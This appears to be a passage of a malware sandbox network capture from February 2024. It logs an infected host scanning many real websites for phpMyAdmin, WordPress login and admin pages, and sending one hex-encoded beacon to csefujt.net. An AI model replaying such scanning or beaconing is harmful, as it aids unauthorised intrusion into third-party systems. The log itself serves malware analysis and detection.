                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45b997b0b1-ATL
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                343192.168.2.661933195.85.23.9580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625372887 CET177OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.849724054 CET756INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 162
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                location: https://ro.bongacams.com/phpMyAdmin
                                                                                                                                                                                                                                                                                                                                                                x-bc: ded7020
                                                                                                                                                                                                                                                                                                                                                                x-zone: 3-web65-ded7020
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=KQdoXLmOQJcbKhseP.EtWw3LEkzLnC8sr1PsAAKoLRQ-1707131766-1-AcAdZDV71hWzvP/naP9SO7zlMUviMxenx2XZEG+PYPwmGnbNdLYV5lTQ80fTSr2r8GyBcPqDeaCsRfND4BxM5tI=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45b9c82439-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                344192.168.2.661950162.241.203.3080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.625483990 CET173OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nossoplayer.me
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.745407104 CET1114INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 836
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                345192.168.2.661942172.203.148.3480
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.629240990 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: eei.uniandes.edu.co
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.746551037 CET155INHTTP/1.1 302 Found : Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Location: https://eei.uniandes.edu.co/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                346192.168.2.661945104.18.32.10980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.631984949 CET174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.767821074 CET606INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/pma/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=; path=/; expires=Mon, 05-Feb-24 11:46:06 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd45cc89677b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                347192.168.2.658322185.196.8.2280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.649481058 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.894161940 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                348192.168.2.661924201.134.41.6180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.650893927 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: academico.um.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.813205957 CET572INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://academico.um.edu.mx/academico/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 342
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 2f 61 63 61 64 65 6d 69 63 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 63 61 64 65 6d 69 63 6f 2e 75 6d 2e 65 64 75 2e 6d 78 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://academico.um.edu.mx/academico/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at academico.um.edu.mx Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                349192.168.2.66189587.233.198.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.654476881 CET187OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: idp.uitgeverij-deviant.nl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.849292040 CET124INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://idp.uitgeverij-deviant.nl/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                350192.168.2.66189113.248.169.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.660784960 CET173OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: secure.vexcorp.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.988056898 CET1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: openresty
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                                                Last-Modified: Mon, 29 Jan 2024 23:30:02 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                ETag: "65b834fa-13b"
                                                                                                                                                                                                                                                                                                                                                                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_HgGLa2ZqsCpCEK8zzb/jbfkVJQcEj7nNxsDThlwrEpzbE9yR2GhYIKzKBPjdoTl7Qia4M0KP1O5IVRwpqQqwcQ
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: caf_ipaddr=81.181.57.74;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: country=RO;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
                                                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 72 6f 6f 74 22 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.js"></script></head><body><div id="root"></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                351192.168.2.66193054.71.181.16080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.668267965 CET176OUTGET /admin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.840606928 CET365INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/admin/
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 75 63 69 76 69 72 74 75 61 6c 2e 75 63 69 2e 65 64 75 2e 6d 78 2f 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="http://ucivirtual.uci.edu.mx/admin/">here</a></body>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.840826035 CET177OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucivirtual.uci.edu.mx
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:08.159965992 CET960INHTTP/1.1 303 See Other
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Language: es-mx
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: http://ucivirtual.uci.edu.mx/admin/index.php?cache=1
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.2.7
                                                                                                                                                                                                                                                                                                                                                                X-Accel-Buffering: no
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: MoodleSession=4lsrugirns1q6gvf0q6tng7mua; path=/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 499
